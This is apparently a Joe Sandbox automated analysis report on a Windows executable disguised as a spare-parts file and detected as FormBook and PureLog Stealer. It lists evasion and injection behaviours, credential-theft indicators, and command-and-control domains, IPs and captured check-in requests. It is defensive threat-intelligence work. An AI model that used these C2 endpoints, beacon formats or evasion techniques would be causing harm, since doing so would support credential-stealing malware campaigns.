Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe

Overview

General Information

Sample name:XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
Analysis ID:1562208
MD5:77f595058c6627bf075a7283b57e1c5d
SHA1:2d62714bf2c62d2f09b13515b4e2aa7735477321
SHA256:8ba1a789e4494fdc1f919352cb4d80f26ea73c3dd94f978c32cde476afceb34a
Tags:exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe" MD5: 77F595058C6627BF075A7283B57E1C5D)
    • XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe" MD5: 77F595058C6627BF075A7283B57E1C5D)
      • xAbOwtcTtZmjBX.exe (PID: 6884 cmdline: "C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 8056 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • xAbOwtcTtZmjBX.exe (PID: 6784 cmdline: "C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6016 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1938558348.0000000000FF0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.2603137890.0000000000F70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.1391242614.0000000007480000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T10:51:13.632871+010020507451Malware Command and Control Activity Detected192.168.2.949874161.97.142.14480TCP
                      2024-11-25T10:51:39.964629+010020507451Malware Command and Control Activity Detected192.168.2.949933107.155.56.3080TCP
                      2024-11-25T10:51:55.962213+010020507451Malware Command and Control Activity Detected192.168.2.94997213.228.81.3980TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T10:51:13.632871+010028554651A Network Trojan was detected192.168.2.949874161.97.142.14480TCP
                      2024-11-25T10:51:39.964629+010028554651A Network Trojan was detected192.168.2.949933107.155.56.3080TCP
                      2024-11-25T10:51:55.962213+010028554651A Network Trojan was detected192.168.2.94997213.228.81.3980TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-25T10:51:31.821289+010028554641A Network Trojan was detected192.168.2.949913107.155.56.3080TCP
                      2024-11-25T10:51:34.477690+010028554641A Network Trojan was detected192.168.2.949921107.155.56.3080TCP
                      2024-11-25T10:51:37.258859+010028554641A Network Trojan was detected192.168.2.949927107.155.56.3080TCP
                      2024-11-25T10:51:47.868179+010028554641A Network Trojan was detected192.168.2.94995313.228.81.3980TCP
                      2024-11-25T10:51:50.524880+010028554641A Network Trojan was detected192.168.2.94995913.228.81.3980TCP
                      2024-11-25T10:51:53.180646+010028554641A Network Trojan was detected192.168.2.94996613.228.81.3980TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==Avira URL Cloud: Label: malware
                      Source: http://www.taxiquynhonnew.click/y49d/Avira URL Cloud: Label: malware
                      Source: https://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgAvira URL Cloud: Label: malware
                      Yara detected FormBook
                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1938558348.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603137890.0000000000F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603506691.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2602984671.0000000001060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2603358231.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1939504326.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeJoe Sandbox ML: detected
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: tzutil.pdbGCTL source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2602793009.0000000001368000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xAbOwtcTtZmjBX.exe, 00000006.00000002.2601239645.000000000044E000.00000002.00000001.01000000.0000000C.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000000.2012860631.000000000044E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1938178930.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1940155540.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1938178930.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1940155540.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: mSVq.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: Binary string: mSVq.pdbSHA256 source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: Binary string: tzutil.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2602793009.0000000001368000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00ABC9D0 FindFirstFileW,FindNextFileW,FindClose,9_2_00ABC9D0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then xor eax, eax9_2_00AA9F80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then mov ebx, 00000004h9_2_031C04D0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49927 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49966 -> 13.228.81.39:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49921 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49913 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49933 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49933 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49959 -> 13.228.81.39:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49972 -> 13.228.81.39:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49972 -> 13.228.81.39:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49874 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49874 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49953 -> 13.228.81.39:80
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.070001325.xyz
                      Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                      Source: Joe Sandbox ViewIP Address: 13.228.81.39 13.228.81.39
                      Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                      Source: Joe Sandbox ViewASN Name: UHGL-AS-APUCloudHKHoldingsGroupLimitedHK UHGL-AS-APUCloudHKHoldingsGroupLimitedHK
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /gebt/?Ap=KZH8jfU0&BzI0pR=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.070001325.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /2gcl/?BzI0pR=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZelj0tsTwcFH17YLMDQdjUbN6i8hA==&Ap=KZH8jfU0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.expancz.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.taxiquynhonnew.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global trafficDNS traffic detected: DNS query: www.070001325.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.expancz.top
                      Source: global trafficDNS traffic detected: DNS query: www.taxiquynhonnew.click
                      Source: global trafficDNS traffic detected: DNS query: www.epitomize.shop
                      Source: unknownHTTP traffic detected: POST /2gcl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.expancz.topOrigin: http://www.expancz.topConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 195Cache-Control: max-age=0Referer: http://www.expancz.top/2gcl/User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 42 7a 49 30 70 52 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 54 43 31 6e 66 77 71 77 2b 36 4a 46 31 4f 30 68 73 72 53 62 6d 30 62 52 6c 36 78 44 Data Ascii: BzI0pR=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC1nfwqw+6JF1O0hsrSbm0bRl6xD
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 09:51:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                      Source: xAbOwtcTtZmjBX.exe, 0000000A.00000002.2602984671.00000000010B6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click
                      Source: xAbOwtcTtZmjBX.exe, 0000000A.00000002.2602984671.00000000010B6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click/y49d/
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                      Source: xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dq0ib5xlct7tw.cloudfront.net/
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://l3filejson4dvd.josyliving.com/favicon.ico
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.7
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: tzutil.exe, 00000009.00000003.2130647535.0000000007D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s.yimg.com/wi/ytc.js
